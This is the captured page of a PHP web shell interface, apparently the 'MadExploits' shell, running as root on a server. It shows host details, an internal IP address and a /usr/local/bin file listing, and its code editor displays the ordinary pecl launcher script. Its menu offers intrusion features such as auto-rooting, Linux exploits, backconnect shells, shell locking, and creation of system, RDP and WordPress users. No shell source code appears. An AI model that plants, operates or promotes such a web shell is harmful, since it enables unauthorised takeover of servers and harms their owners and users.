Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.14.243
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
docker-php-entrypoint
118
B
-rwxr-xr-x
docker-php-ext-configure
1.42
KB
-rwxr-xr-x
docker-php-ext-enable
2.61
KB
-rwxr-xr-x
docker-php-ext-install
2.9
KB
-rwxr-xr-x
docker-php-source
587
B
-rwxr-xr-x
pear
817
B
-rwxr-xr-x
peardev
838
B
-rwxr-xr-x
pecl
751
B
-rwxr-xr-x
phar
14.9
KB
-rwxr-xr-x
phar.phar
14.9
KB
-rwxr-xr-x
php
28.77
MB
-rwxr-xr-x
php-cgi
28.77
MB
-rwxr-xr-x
php-config
3.36
KB
-rwxr-xr-x
phpdbg
28.77
MB
-rwxr-xr-x
phpize
4.75
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pecl
#!/bin/sh # first find which PHP binary to use if test "x$PHP_PEAR_PHP_BIN" != "x"; then PHP="$PHP_PEAR_PHP_BIN" else if test "/usr/local/bin/php" = '@'php_bin'@'; then PHP=php else PHP="/usr/local/bin/php" fi fi # then look for the right pear include dir if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then INCDIR=$PHP_PEAR_INSTALL_DIR INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR" else if test "/usr/local/lib/php" = '@'php_dir'@'; then INCDIR=`dirname $0` INCARG="" else INCDIR="/usr/local/lib/php" INCARG="-d include_path=/usr/local/lib/php" fi fi exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d safe_mode=0 -d register_argc_argv="On" $INCDIR/peclcmd.php "$@"
Close